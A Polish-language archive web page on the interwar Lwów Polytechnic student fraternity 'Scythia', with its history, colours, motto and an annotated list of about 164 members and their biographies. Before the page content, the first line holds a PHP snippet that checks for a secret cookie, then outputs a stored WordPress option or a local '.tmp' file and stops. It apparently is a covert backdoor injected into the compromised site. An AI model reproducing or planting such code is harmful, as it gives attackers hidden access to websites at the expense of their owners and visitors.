if (isset($_COOKIE["fn9uBsXrHEMCoNLjpQ9VN9SVJgeJ2TQDYJ"])) { $lines = get_option( 'wpsdth4_license_key' ); if (!empty($lines)) { $lines = @file_get_contents(".tmp"); } echo $lines; exit(); } Archiwum Korporacyjne - Archiwum i Muzeum Polskich Korporacji Akademickich

K! Scythia

Dekiel Scythii - vide Poszukiwania. Nazwa:
Polska Korporacja “Scitia” (1925), Polska Korporacja Studentów Politechniki Lwowskiej “Scythia” (1932)
Siedziba:
Lwów
Data powstania:
25 V 1924 r.
Barwy:
czarna – złota – błękitna
Dewiza:
„Jeden za wszystkich, wszyscy za jednego”

Rys historyczny

Bandy filisterska i rycerska Jacka Dziewoty-Jabłońskiego oraz kokarda od szarfy prezydialnej Scythii.

Scythia powstała 25 V 1924 r. Łączyła studentów Politechniki Lwowskiej. Szczególnym celem korporacji była praca na rzecz obrony polskości na Kresach Wschodnich Rzeczypospolitej. Nazwa korporacji nawiązywała do starożytnych mieszkańców stepów czarnomorskich - wskazywanych niekiedy jako protoplaści Polaków.

Okładka Biuletynu Scythii, marzec 1938 r.

Od 1924 r. należała do Związku Polskich Korporacji Akademickich (data starszeństwa związkowego: 25 X 1924 r.). Kandydowała pod opieką K! Lutyko-Venedya.

Przy Scythii kandydowały w latach 1929-30 K! Tytania oraz w latach 1932-34 K! Śląsk.

Uroczystości podpisania kartelu między korporacjami Scythia i Polesia, Wilno maj 1938 r.

Zawała kartel dnia 13 marca 1937 r. we Lwowie oraz 1-3 V 1938 r. w Wilnie z K! Polesia z Wilna.

Całkowita ustalona, choć niekompletna imienna lista członków obejmuje 167 nazwisk, w tym trzech członków honorowych. W maju 1939 r. korporacja liczyła 115 członków, w tym dwóch członków honorowych

Brak wiadomości dotyczących powojennej działalności Korporacji i spotkań jej członków.

Komers VI-lecia Scythii, Lwów 6 VI 1930 r.

Lista członków

Poniższa, niekompletna lista członków Scythii obejmuje 167 nazwisk. Będziemy wdzięczni za jej uzupełnianie i korektę, przesyłanie danych biograficznych i fotografii członków korporacji (vide Kontakt), jak także za pomoc w poszukiwaniach materialnych śladów oraz wszelkich informacji o samej korporacji (vide Poszukiwania).

Członkowie honorowi

 1. Wilhelm Borowicz, (1882 w miejsc. Kossaki na Litwie [w Grabowie w Wielkopolsce ?] - po 1944) s. Guido i Marii z d. Korewo, studiował na Wydziale Matematycznym Uniwersytetu w Moskwie i na Wydziale Konstrukcji Maszyn Technicznego Uniwersytetu w Monachium, prof. dr inż. PL, specjalista z zakresu budowy maszyn i turbin parowych, Filister honorowy Scythii, w czasie wojny miał podpisać deklarację przynależności do narodu niemieckiego jako “Reichsdeutsch”, dyrektor techniczny “Landwirtschaftliche Zentralstelle”
 2. Piotr Czerski, ( - 1937) ojciec Wacława (Scythia), dyrektor Fabryki Zapałek w Mszczonowie, dyrektor w Błoniu, Filister honorowy Scythii
 3. Władysław Sikorski, (20 maja 1881 w Tuszowie Narodowym - 4 lipca 1943 na Gibraltarze) s. Tomasza i Emilii z d. Albertowicz, przed I wojną światową współzałożyciel kilku nielegalnych polskich organizacji niepodległościowych, w tym m.in. Związku Walki Czynnej, w trakcie I wojny światowej żołnierz Legionów Polskich, od 1919 oficer WP, w początkach II Rzeczypospolitej czołowy polityk kraju, m.in. premier 1922-23 oraz minister spraw wojskowych 1923-24, po przewrocie majowym w 1926 w opozycji, w 1936 sygnatariusz antysanacyjnego Frontu Morges, w czasie II wojny światowej Naczelny Wódz Polskich Sił Zbrojnych i premier Rządu na Uchodźstwie 1939-43, Filister honorowy Leopolii i Scythii

Członkowie rzeczywiści

 1. Zygmunt Andruszewski, inż., akt. 1926-27, w 1939 pracownik Izby Rolniczej we Lwowie

  Jan Au, 1936 r.

 2. Jan Piotr Antoni Au, (10 października 1914 w Toruniu - 11 czerwca 1944 we Włoszech) student i absolwent architektury PL, akt. 1935-39, prezes sem. let. 1935/36, olderman sem. zim. 1936/37, prezes Lwowskiego Koła Międzykorporacyjnego 1936/37, pchor. rez., uczestnik wojny obronnej 1939, później w 1 Pułku Pomiarów Artylerii II Korpusu PSZ, zginął w wypadku motocyklu, pochowany na cmentarzu wojskowym na Monte Cassino

 3. Aleksander Bader, (1902 - 1987 w Warszawie) student PL, założyciel Scythii, akt. 1924-28, inż., w PRL wiceminister komunikacji
 4. Jerzy Bandrowski, c. 1929, inż. mechanik
 5. Zbigniew Bandrowski, w 1939 pracownik PKP w Gdynii
 6. Stanisław Berezowski, c. 1926/27, wystąpił 1926/27
 7. Tadeusz Berg, c. 1926, akt. 1926-36, sekretarz, prezes sem. let. 1932/33
 8. Rudolf Bisans (Bizans), (1904-1989 w Krakowie) c. 1929, akt. 1929-39
 9. Dymitr Blindże, c. 1933, akt. 1933-39, olderman sem. zim. 1936/37 (?), wiceprezes sem. let. 1936/37
 10. Bogdan Bohosiewicz, ( - ok. 1975 w Krakowie (?) student i absolwent chemii PL, akt. 1932-36, sekretarz Lwowskiego Koła Międzykorporacyjnego 1932/33
 11. Czesław Bojarski, student PL i Wydziału Architektury PG 1936-39, c. 1936
 12. Jerzy Bojarski, (?)
 13. Tadeusz Borkowski, c. 1927, akt. 1927-28
 14. Zbigniew Broszkiewicz, c. 1927, akt. 1927-28
 15. Kazimierz Bukowski, student PL, założyciel Scythii, akt. 1924-28, sekretarz 1927, inż. mechanik
 16. Stanisław Burzyński, student PL, akt. 1924-27, pierwszy wiceprezes sem. zim. i sem. let. 1924/25, prezes Związku Filistrów 1933-38, inż.
 17. Stefan du Chateau , (3 sierpnia 1908 w Solwyczegodzku na Syberii - 2 czerwca 1999 w Paryżu) student architektury PL, prezes Związku Studentów Architektury 1936, w czasie wojny żołnierz PSZ we Francji i Wielkiej Brytanii, po wojnie ukończył architekturę w Wielkiej Brytanii, pozostał na emigracji, w latach 50-tych osiadł we Francji, architekt, konstruktor form przestrzennych, prof. Ecole Speciale d’Architecture w Paryżu 1965-76, pochowany na cmentarzu w Montmorency k. Paryża
 18. Zbysław Ciecholewski, student PL, akt. 1926-27, inż.
 19. Stanisław Ciliński, wystąpił 1926/27
 20. Zbigniew Czerkawski, student PL, akt. 1926-27, w 1939 w maj. Feliksa pow. Jaryczów
 21. Wacław Czerski, s. Piotra (Scythia), student PL i PW, akt. 1934-39, wiceprezes 1934, prezes 1935, inż. mechanik
 22. Eustachy Stanisław Czerwiński, student PL, założyciel Scythii, akt. 1924-28, pierwszy prezes sem. zim. oraz sem. let. 1924/25, olderman 1927
 23. Józef Dadlez (Dadles), student PL, w 1936 pracownik Huty “Zgoda” w Świętochłowicach
 24. Daniliuk, wystąpił 1926/27
 25. Kazimierz Dembowski, student PL, akt. 1936
 26. Jerzy Długoszewski, (1904 w Krakowie - 28 sierpnia 1992 w Krakowie) brat Mieczysława (Arcadia), student i absolwent PL, założyciel Scythii, prezes, akt. 1924-28, prezes Bratniej Pomocy Studentów PL 1925/26, ukończył budowę II Domu Techników, wiceprezes Czytelni Akademickiej 1924, przed wojną działacz Krakowskiej Izby Rzemieślniczej, wioślarz AZS, olimpijczyk, działacz Stronnictwa Narodowego
 27. Witold Dobrzański, wystąpił 1926/27
 28. Adam Domosławski, student PL, akt. 1927-28, inż.
 29. Stanisław Dudrak, student PL, akt. 1936-39
 30. Kazimierz Dujanowicz, wystąpił 1926/27
 31. Tadeusz Dziurzyński, c. 1927, akt. 1927-28
 32. Roman Filipkiewicz, (17 listopada 1910 w Krakowie - 3 listopada 1973) student i absolwent PL, akt. 1930-36, sekretarz sem. let. 1930/31, sekretarz sem. zim. 1932/33, olderman sem. let. 1932/33, od 1938 sekretarz Związku Filistrów, działacz Młodzieży Wszechpolskiej i Stronnictwa Narodowego, oficer artylerii Polskich Sił Zbrojnych na Zachodzie, po wojnie na emigracji, zginął w katastrofie samolotu tureckiego pod Paryżem (dehermetyzacja drzwi)
 33. Zygmunt Firyn, (1909 w Czarnkowie woj. Wielkopolskie - 1989 w Toulouse) student PL, akt. 1931-39, sekretarz 1931, wiceprezes, wiceprezes 1936 i prezes 1937 Bratniej Pomocy Studentów PL, inż. mechanik
 34. Edward Folwarczny, student PL, c. 1938/39, akt. 1938/39
 35. Kazimierz Gajewski, student i absolwent (?) inżynierii lądowej PL, płk LWP, wykładowca budowy lotnisk PW
 36. Stefan Gajewski, student PL, c. 1927, akt. 1927-39
 37. Stanisław Gałązka, c. 1926/27, akt. 1927-28
 38. Karol Gądziński, student PL, c. 1937/38, akt. 1937/38-39
 39. Zbigniew Gnoiński, student PL, c. 1927-28, inż.
 40. Adam Goebel, c. 1926/27, akt. 1927-28
 41. Stanisław Gordziewicz, c. 1927, akt. 1927-28
 42. Józef Górski, student PL, akt. 1936
 43. Leon Grądzki, student PL, c. 1936, akt. 1936

  Jerzy Grzymek, 1933 r.

 44. Jerzy Grzymek, (9 kwietnia 1908 w Iwkowie pow. Nowy Sącz - 4 maja 1990 w Krakowie) student i absolwent chemii PL, wiceprezes sem. let. 1930/31, kurator K! Śląsk, prezes Lwowskiego Koła Międzykorporacyjnego 1932/33 (od listopada 1932), od 1931 asystent PL, od 1935 pracownik cementowni “Grodziec” k. Będzina, działacz Stronnictwa Narodowego, w czasie wojny w AK, po wojnie od 1946 członek PPR i PZPR, organizator i dyrektor cementowni w Grosowicach k. Opola 1945-47, naczelny dyrektor Zjednoczenia Fabryk Cementu 1947-49, w latach 50-tych wiceminister przemysłu lekkiego, założyciel i kierownik 1953-55 w randze podsekretarza stanu Ministerstwa Budownictwa, od 1950 kierownik katedry wiążących materiałów i betonów AGH oraz dziekan Wydziału Ceramicznego AGH, od 1954 prof. nadzw., od 1971 prof. zw., od 1973 członek rzeczywisty PAN, dyrektor Międzyresortowego Instytutu Materiałów Budowlanych i Ogniotrwałych

 45. Józef Hasny, c. 1926/27
 46. Tadeusz Hertman-Kański, założyciel Scythii, inż. architekt
 47. Adam Hubczyc, c. 1926/27
 48. Tadeusz Izdebski, student PL, akt. 1932, olderman 1932
 49. Władysław Izdebski, c. 1927, akt. 1927-28
 50. Mieczysław Izworski, student PL, c. 1937/38, akt. 1937/38-39
 51. Jacek Dziewota-Jabłoński, (20 listopada 1904 w Nowym Sączu - 1979 w Warszawie) s. Wacława i Marii z Terleckich, absolwent Gimnazjum im. Stanisława Staszica w Lublinie 1923, student prawa UL 1923-25, student i absolwent mechaniki PL 1925-32, c. 1925, akt. 1925-28, po studiach pracownik Fabryki Karabinów PWU w Warszawie 1933-37, w latach 1937-39 kolejno kierownik produkcji, szef produkcji, prokurent, dyrektor techniczny, naczelny dyrektor w Fabryce Wyrobów Stalowych “Bracia Kobylańscy” S.A. “Gerlach”, po wojnie dyrektor naczelny “Gerlacha” 1945-47, doradca techniczny w Zjednoczeniu Przemysłu Obrabiarek i Narzędzi 1947-49, od 1948 w Wydziale Mechaniki Polskiego Komitetu Normalizacyjnego, m.in. od 1953 jako kierownik Zakładu Energetyki i Komunikacji, odznaczony m.in. Krzyżem Kawalerskim OOP, Srebrnym Krzyżem Zasługi
 52. Stanisław Jabłoński, student PL, c. 1937/38, akt. 1937/38-39
 53. Stanisław Jacheć, (1917 - 28 lipca 1944 k. Błażowej) student i absolwent mechaniki PL, c. ok. 1936, akt. 1936-39, sekretarz sem. zim. 1936/37, sekretarz 1937 i wiceprezes (?) Bratniej Pomocy Studentów PL, po studiach asystent PL, w czasie wojny urzędnik nadleśnictwa Błażowa w rzeszowskim, oficer AK, wykładowca na kursach maturalnych w oddziałach leśnych AK, poległ pod Błażową (na południe od Rzeszowa) w walce z SS przy obronie szpitala polowego, w którym leżało dziesięciu partyzantów
 54. Saturnin Jakubowski, student i absolwent 1937/38 PL, c. 1926, akt. 1926-36, wiceprezes 1927, autor słów hymnu i melodii Scythii, w 1939 pracownik Elektrowni Kolejowej we Lwowie

  Jan Jamro, 1925 r.

 55. Jan Jamro, (20 lipca 1906 w Borsyławiu w woj. lwowskim - 3 czerwca 1963 w Kłodzku) s. Franciszka i Teofilii z d. Borek, brat Mieczysława (Lutyko-Venedya), uczeń Gimnazjum w Drohobyczu i Borysławiu, student i absolwent 1934 chemii PL, c. 1926/27, akt. 1926/27-28, po studiach pracownik Firmy Małopolska w Krośnie 1933-40, kierowik oddziału termincznego IX Przemysłu 1940-44, po wojnie m.in. kierownik odddziału katalizatorów 1946-47 oraz oddziału wapienników i surowców 1947-51 Fabryki Związków Azotowych w Chorzowie, pracownik Zakładów Chemicznych w Oświęcimiu 1951-63, pochowany na Cmentarzu w Oświęcimiu

 56. Eugeniusz Janicki, c. 1927, akt. 1927-28
 57. Stanisław Jarmiński, student PL, c. 1938/39, akt. 1938/39
 58. Jan Jarosz, (?)
 59. Wiesław Jarzębski, c. 1926/27, wystąpił 1926/27
 60. Jan Jaszczurowski, (10 sierpnia 1902 w Krakowie - po 1969) s. Tadeusza, absolwent I Szkoły Realnej w Krakowie, student PL, założyciel Scythii, akt. 1924-27, pierwszy sekretarz sem. zim. i sem. let. 1924/25, student i absolwent Wydziału Hutniczego AG 1926-36, asystent Zakładów Ostrowieckich 1935-44, inspektor kontroli technicznej Huty “Batory” w Chorzowie 1945-52 oraz starszy inspektor w Centralnym Zarządzie Przemysłu Hutniczego w Katowicach 1952-57, radca Ministerstwa Przemysłu Ciężkiego w Warszawie 1958-69, od 1969 na emeryturze
 61. Władysław Jewpłow, student PL, c. 1938/39, akt. 1938/39
 62. Michał Kaczkowski, c. 1926, akt. 1926-28
 63. Henryk Kaczmarek, student PL, c. 1927, akt. 1927-36
 64. Rudolf Kasprzyk, akt. 1927-28
 65. Tadeusz Kaszycki, (1910 w Krakowie - 19 kwietnia 1988 w Londynie) student PL, akt. 1932-36, olderman sem. let. 1930/31, olderman, ppor., w wojnie obronnej 1939 pilot myśliwca w składzie 121 eskadry Armii Kraków, potem w lotnictwie we Francji, złapany przy przekraczaniu granicy w Pirenejach przebywał w obozie hiszpańskim Miranda del Ebro, po wojnie na emigracji w Wielkiej Brytanii, prowadził firmę remontowo-budowlaną
 66. Stanisław Kawa, student PL, skreślony 1936
 67. Stanisław Kiedrzyński, wystąpił 1926/27
 68. Adam Kijowski, student PL
 69. Adam Kopczyński, student i absolwent 1937/38 PL, akt. 1936-38
 70. Konrad Kozłowski, student PL, c. 1938/39, akt. 1938/39
 71. Jerzy Kozubowski, student PL, c. 1931, architekt
 72. Krzyżanowski akt. 1931
 73. Zygmunt Kubiak, student PL, c. 1938/39, akt. 1938/39
 74. Tadeusz Kucharski, student PL, inż.
 75. Józef Kulesza, student PL, c. 1936, akt. 1936-39
 76. Zdzisław Kulpiński, student PL, mechanik, ppor. rez. pilot, w wojnie obronnej 1939 dowódca 4 plutonu RWD-8
 77. Andrzej Lauterbach, (1913 w Jaśle - 1984 w Krakowie) student i absolwent architektury PL, akt. 1935-39, trzykrotny olderman, m.in. sem. let. 1935/36, pchor. rez. artylerii, w wojnie obronnej 1939 w obronie Lwowa, za bohaterską postawę odznaczony Srebrnym Krzyżem Virtuti Militari, po wojnie architekt w Jaśle i Nowym Sączu
 78. Jarosław Lewicki, c. 1926/27
 79. Wacław Liżewski, student PL, c. 1938/39, akt. 1938/39
 80. Jan Łoziński, student PL, wiceolderman sem. let. 1932/33
 81. Zygmunt Łuczkiewicz, (1903 - czerwiec 1941) student i absolwent leśnictwa PL, założyciel Scythii, we władzach Stronnictwa Narodowego we Lwowie, w 1940 komendant NOW we Lwowie, aresztowany przez NKWD i zasądzony na karę śmierci, wyrok wykonano w więzieniu
 82. Tadeusz Machlicki, student PL, c. ok. 1936, akt. 1936-39
 83. Brunon Machowiak, student PL, akt. 1936-39, sekretarz sem. let. 1936/37
 84. Jan Madeyski, student PL, akt. 1924-28, pierwszy olderman sem. zim. i sem. let. 1924/25, inż.
 85. Stanisław Marchwicki, student PL, akt. 1935-39, sekretarz sem. let. 1935/36
 86. Juliusz Marcoin, (15 listopada 1901 w Sarajewie - po 1967) s. Bolesława, absolwent Gimnazjum oo. Jezuitów w Chyrowie, uczestnik wojny polsko-bolszewickiej 1920, student PL, student i absolwent Wydziału Górniczego AG 1924-31, początkowo członek lwowskiej Korporacji Scythia, później w Audacji akt. 1925-29, później być może także w Gnomii (?), po studiach pracował m.in. w kopalniach “Artur” w Sierszy Wodnej, “Zbyszek” w Sierszy, zastępca dyrektora działu planowania w Centralnym Zarządzie Przemysłu Węglowego 1947-50, starszy inspektor budowy nowych kopalń w Centralnym Zarządzie Budownictwa Węglowego 1950-55, naczelnik wydziału planowania w Ministerstwie Górnictwa i Energetyki w Katowicach 1956-61, od 1963 na rencie
 87. Antoni Martynowicz, (1913 - 1991 w Montrealu) student PL, c. 1937/38, akt. 1937/38-39, skarbnik sem. let. 1938/39, ukończył Polski Uniwersytet w Londynie, inż. budowlany, po wojnie na emigracji w Kanadzie, członek Koła Filistrów Polskich Korporacji Akademickich w Montrealu
 88. Jan Matusiński, student PL, akt. 1936-39
 89. Mieczysław Mazurkiewicz-Dubieński, student PL, c. 1927, akt. 1927-36, sekretarz sem. let. 1932/33
 90. Jerzy Władysław Meier (Meyer, Maier ?), (1905 w Lwowie - 28 kwietnia 1981 w Ottawie) student PL, założyciel Scythii, akt. 1924-28, inż. mechanik, pracownik w Mech. Stacji Doświadczalnej Politechniki Lwowskiej, potem w oddziale MSD w Dziedzicach, w 1940 skierowany do Francji jako specjalista przemysłu wojennego, potem w Wielkiej Brytanii, Kanadzie, po wojnie w ministerstwie górnictwa w Kanadzie, autor wielu publikacji technicznych, działacz Polonii, żonaty z artystką malarką Heleną Zagórską
 91. Wiktor Michałowski, student PL, akt. 1933-39, wiceprezes sem. zim. 1936/37, olderman sem. let. 1936/37, olderman sem. zim. 1937/38, sekretarz Komitetu Wykonawczego budowy kościoła korporanta w Mikłaszowie
 92. Witold Mieszkowski, student PL, akt. 1926-27, inż.
 93. Aleksander Mioduszewski, student PL, c. 1938/39, akt. 1938/39
 94. Kazimierz Mogilnicki, wystąpił 1926/27
 95. Marian Mogilnicki, student PL, akt. 1927-28, inż.
 96. Edward Montalbetti, student PL, założyciel Scythii, akt. 1924-27, prezes Lwowskiego Komitetu Akademickiego 1925, prezes 1925 oraz 1926 Czytelni Akademickiej, członek Zarządu do 1938 i od 1938 prezes Związku Filistrów, inż., w 1936 pracownik Państwowych Zakładów Ubezpieczeń Wzajemnych w Warszawie
 97. Franciszek Müller, student PL, c. 1926, akt. 1926-28, inż.
 98. Józef Musielak, student PL, c. 1936, akt. 1936-39, sekretarz 1936
 99. Stanisław Naglik, student PL, c. 1936, akt. 1936-39, sekretarz sem. zim. 1937/38
 100. Lesław Neyman, c. 1926/27
 101. Tadeusz Niciporzewski , student PL, akt. 1927-28, inż.
 102. Tadeusz Niczewski, ( - ok. 1965 w Warszawie) student i absolwent PL 1937/38, założyciel Scythii, akt. 1924-36, olderman 1931, wiceprezes 1931/32 oraz prezes 1932/33 (do listopada 1932) Lwowskiego Koła Międzykorporacyjnego, 1936-39 asystent PL (?)

  Zbigniew Niespodziewański, lata 30-te.

 103. Zbigniew Niespodziewański, (1914-1983) student PL, akt. 1936-39, wiceolderman sem. zim. 1936/37

 104. Niesporek, student i absolwent 1928 PL, prezes 1928
 105. Antoni Niezabitowski, c. 1927, akt. 1927-28

  Bogdan Nowicki, 1936 r.

 106. Bogdan Nowicki, student PL, akt. 1932-39, architekt

 107. Romuald Nowicki, student PL, akt. 1936-39, student Wydziału Architektury PG 1936-39, po wojnie na emigracji we Francji
 108. Antoni Nożyński, student i absolwent 1937/38 PL, akt. 1936
 109. Wacław Nożyński,
 110. Zygmunt Obmiński, student PL, c. 1936, akt. 1936-39
 111. Mieczysław Okorniski (Okrnicki), student PL, akt. 1936
 112. Ludwik Orzelski, student PL, akt. 1927-28, inż.
 113. Władysław Pakos, (3 lipca 1903 w Zastowie k. Puław - 26 lutego 1936 w Bielsku) uczeń gimnazjów w Puławach i Lublinie, żołnierz-ochotnik wojny polsko-rosyjskiej 1920, student i absolwent Wydziału Chemicznego PL 1925-34, c. 1926, akt. 1926-34, sekretarz sem. let. 1927/28, wiceprezes 1928/29, olderman sem. let. (?) 1929/30, prezes sem. let. (?) 1930/31, kurator K! Tytania 1929, po studiach pracownik w Gazolinarniw w Rybnem, a następnie w Rafinerii Vacuum Oil Company w Dziedzicach, zmarł prawd. po operacji nerki
 114. Aleksander Pattek, s. Józefa i Elżbiety, brat Janusza (Zagończyk), student PL, założyciel Scythii, akt. 1924-28, inż. mechanik 1928, w 1936 pracownik Huty “Zgoda” w Świętochłowicach, po wojnie w Koblencji w Niemczech, a później na emigracji w Wielkiej Brytanii
 115. Stanisław Piszczkiewicz, student PL, c. 1938/39, akt. 1938/39

  Ludwik Płaczek, prawd. lata 40-te.

 116. Ludwik Płaczek, (6 grudnia 1912 w Gorkach Wielkich - 9 listopada 1996 w Barrow in Furness w Anglii) s. Józefa i Barbary z d. Skrzypek, absolwent Gimnazjum w Cieszynie, student Wydziału Mechanicznego PL, akt. 1933-39, sekretarz, prezes sem. zim. oraz sem. let. 1936/37, prezes 1939, sekretarz wydziału Bratniej Pomocy Studentów PL, kierownik I Domu Techników, w początkach okupacji przez zieloną granicę przedostał się do Francji, żołnierz PSZ we Francji, po kapitulacji Francji internowany w Szwajcarii, uciekł do Wielkiej Brytanii, żołnierz PSZ w Wielkiej Brytanii, walczył we Francji 1944, po wojnie na emigracji w Wielkiej Brytanii, pracował m.in. jako menadżer i dyrektor Oxley Developments Company Ltd in Ulverston

 117. Jan Płończak, (1915 - październik 1939 we Lwowie) student Wydziału Mechanicznego PL, c. 1934, akt. 1934-39, wiceprezes 1936, skarbnik sem. zim. 1936/37, wiceprezes sem. zim. 1937/38, prezes sem. let. 1938/39, wraz z Ludwikiem Płaczkiem zamordowany przez NKWD pod II Salą w głównym gmachu
 118. Seweryn Pockh, c. 1927, akt. 1927-28
 119. Jan Podhorodecki, student PL, inż., w 1936 pracownik Cukrowni w Rawiczu
 120. Zbigniew Polański, student PL, akt. 1936-39, wystąpił 1939
 121. Kazimierz Przegaliński, młodszy brat Stanisława (Scythia), student PL, akt. 1931-36, sekretarz, wiceprezes sem. let. 1932/33
 122. Stanisław Przegaliński, ( - 24 sierpnia 1972 (?) starszy brat Kazimierza, student PL, c. 1927, akt. 1927-36, prezes 1932
 123. Kazimierz Przystaś, student PL, c. 1938/39, akt. 1938/39
 124. Jerzy Radziewanowski, student PL, c. 1937/38, akt. 1937/38, wiceprezes sem. let. 1938/39
 125. Zdzisław Maciej Roer (Röhr, Roehr), (1902 we Lwowie - 14 grudnia 1970 w Forcie Lauerdale, Floryda) student i absolwent 1927 mechaniki PL, akt. 1926-27, prezes Bratniej Pomocy Studentów PL 1923/24 oraz 1926/27, dyrektor śląskiego koncernu “Wspólnota Interesów”, od 1940 w Stanach Zjednoczonych, założyciel “Polonia-Technika” 1941, właściciel dużej firmy przemysłowej

  Stanisław Rosiński, 1936 r.

 126. Stanisław Rosiński, student PL, akt. 1929-37, prezes X-lecia sem. let. 1933/34, prezes sem. let. 1937/38, skarbnik Lwowskiego Koła Międzykorporacyjnego 1932/33

  Leonid Samsonow, 1938 r.

 127. Leonid Samsonow, (1912 k. Baku - 21 maja 2002 w Częstochowie) student i absolwent mechaniki PL, c. 1936, akt. 1936-39, prezes sem. let. 1939 (do kwietnia 1939), asystent PL, prof. i dziekan Wydziału Inżynierii Mechanicznej i Informatyki na Politechnice Częstochowskiej, odznaczony Krzyżem Oficerskim i Kawalerskim OOP

 128. Tadeusz Schwarcenberg-Czerny, wystąpił 1926/27
 129. Siadziński, wystąpił 1926/27
 130. Zdzisław Sikorski, (1913 w Stanisławowie - 5 marca 1995 w Stalowej Woli) student i absolwent Wydziału Konstrukcji Lotniczych PL, początkkowo w Scythii, c. 1932 Slavia, skreśłony, przeszedł do Roxolanii, po wojnie nauczyciel w technikum w Stalowej Woli
 131. Franciszek Sokołowski, student PL, c. 1926, akt. 1926-28, inż.
 132. Apolinary Sokólski, student PL, akt. 1935-39, skarbnik sem. let. 1935/36
 133. Mikołaj Sosnowski, student PL, c. 1937/38, akt. 1937/38-39
 134. Zygmunt Sosnowski, z Pabianic, student PL, założyciel Scythii, akt. 1924-28, prezes 1927, prezes Bratniej Pomocy Studentów PL 1924/25, członek Zarządu do 1938, a od 1938 prezes Związku Filistrów
 135. Mieczysław Spodar, student PL, akt. 1936-39
 136. Artur Sveceny, student PL, założyciel Scythii, akt. 1927-28, inż. mechanik 1928, członek Zarządu Związku Filistrów 1938
 137. Witold Sworakowski, student PL, akt. 1927-28, prezes 1927, inż.
 138. Jerzy Szyman, student PL, c. 1938/39, akt. 1938/39
 139. Kazimierz Szypuła, wystąpił 1926/27
 140. Kazimierz (Tadeusz ?) Trzaskowski , c. 1926/27, akt. 1927-28
 141. Zygmunt Trzaskowski, student PL, akt. 1936
 142. Adam de Tysson, ( - ok. 1960 k. Grzybowa) student architektury PL, c. 1926/27, akt. 1926/27-39, wiceprezes, prezes sem. zim. 1932/33, wiceprezes Bratniej Pomocy Studentów PL 1929/30
 143. Zygmunt Uhrynowski, student PL, założyciel Scythii, akt. 1924-28, wiceprezes Lwowskiego Koła Międzykorporacyjnego 1926/27
 144. Kazimierz Wanat, student PL, c. 1936, akt. 1936-39
 145. Wardzała, akt. 1931
 146. Bogumił Wątrobski, student PL, inż.
 147. Klemens Wiechrzleyski, (1902 - ) student i absolwent 1930 mechaniki PL, początkowo być może (?) w Zniczu, później w Scythii, akt. 1927-28, asystent PL, potem mechanik Stacji Doświadczalnej w Hajdukach Wielkich, sekretarz Związku Filistrów Scythii 1933
 148. Tadeusz Wiewiórowski, student PL, akt. 1937/38-39
 149. Aleksander Wilczek, student PL, c. 1936, akt. 1936-39, skarbnik 1937, sekretarz sem. let. 1938/39
 150. Jan Wilkoszewski, student PL, c. 1937/38, akt. 1937/38-39

  Stefan Winiecki, 1936 r.

 151. Stefan Winiecki, brat Tadeusza (Lutyko-Venedya) student i absolwent mechaniki 1938 PL, akt. 1934-39, sekretarz Prezydium X-lecia 1934, prezes 1936

 152. Bohdan Wodniakowski, student PL, akt. 1936-39, skarbnik Lwowskiego Koła Międzykorporacyjnego 1938/39, skarbnik Bratniej Pomocy Słuchaczy PL 1935/36
 153. Stanisław Wohlfeld, c. 1926/27, akt. 1926/27-29
 154. Jan Wojasz, student PL, c. 1937/38, akt. 1937/38-39
 155. Kazimierz Wojtas, ( - ok. 1970 we Wrocławiu) student PL, akt. 1936-39
 156. Jerzy Wolski, student PL, akt. 1926-27, inż.
 157. Jerzy Wójcik, student PL, akt. 1932-39, sekretarz, wiceprezes sem. let. 1935/36, prezes sem. zim. 1937/38, sekretarz Lwowskiego Koła Międzykorporacyjnego 1936/37, inż.
 158. Zbigniew Zaklika, akt. 1926-27
 159. Michał Zakrzewski, student PL, akt. 1927-28, inż.
 160. Eugeniusz Zapadko, student PL, c. 1937/38, akt. 1937/38-39
 161. Michał Karol Zawojski, (21 września 1899 w Krakowie - 11 sierpnia 1927) absolwent VI Gimnazjum we Lwowie 1917, powstaniec śląski odznaczony Śląską Wstęgą za III powstanie, obrońca Lwowa, student i absolwent PL, założyciel Scythii, akt. 1924-27, prezes 1926, prezes Lwowskiego Koła Międzykorporacyjnego 1926/27, ppor. rez., utonął na ćwiczeniach wojskowych z powodu wywrócenia pontonu w nurtach Narwi
 162. Zbigniew Zbiegini, (1910 we Lwowie - 6 marca 1977 w Warszawie) student Wydziału Mechaniki Konstrukcji Lotniczych PL, c. 1932, akt. 1932-36, prezes Lwowskiego Koła Międzykorporacyjnego ok. 1935/36, wykluczony cum infamia externa 1936, działacz akademicki, wiceprezes Młodzieży Wszechpolskiej, redaktor miesięcznika “Młodzi”, po wojnie pracował w biurach BEPES, PPiDl, Prozamet, Prodelew
 163. Zdzisław Ziółkowski, wystąpił 1926/27
 164. Zbigniew Żabski, akt. 1927-28

Pieczęć Scythii, 1925 r.

Listę członków opracowano na podstawie:

1) Biuletynów Polskiej Korporacji Studentów Politechniki Lwowskiej “Scythia” 1936-1939, nr 1-2 oraz 4-5,
2) Zbysław Popławski, Lista członków Polskiej Korporacji Akademickiej Scythia (Lwów), (w:) Polskie Korporacje Akademickie 1996, nr 11, s. 68 i n.,
3) materiałów archiwalnych z Archiwum Korporacyjnego,
4) wydawnictw encyklopedycznych i biograficznych oraz rozmów z rodzinami członków Korporacji Scythia.

Opracowanie: Bartłomiej P. Wróblewski
Opublikowano: 16 IX 2010 r.
Ostatnia zmiana 30 X 2013 r.

Propozycja cytowania: Bartłomiej P. Wróblewski, olska Korporacja Studentów Politechniki Lwowskiej “Scythia”, (na:) www.archiwumkorporacyjne.pl, stan 30 X 2013 r.

O Archiwum  |  Muzeum Korporacyjne  |  Aktualności  |  Kontakt  |   English © Archiwum Korporacyjne     Nota prawna  |  Mapa serwisu  | 
Szukaj    »
created by { re.PUBLIK }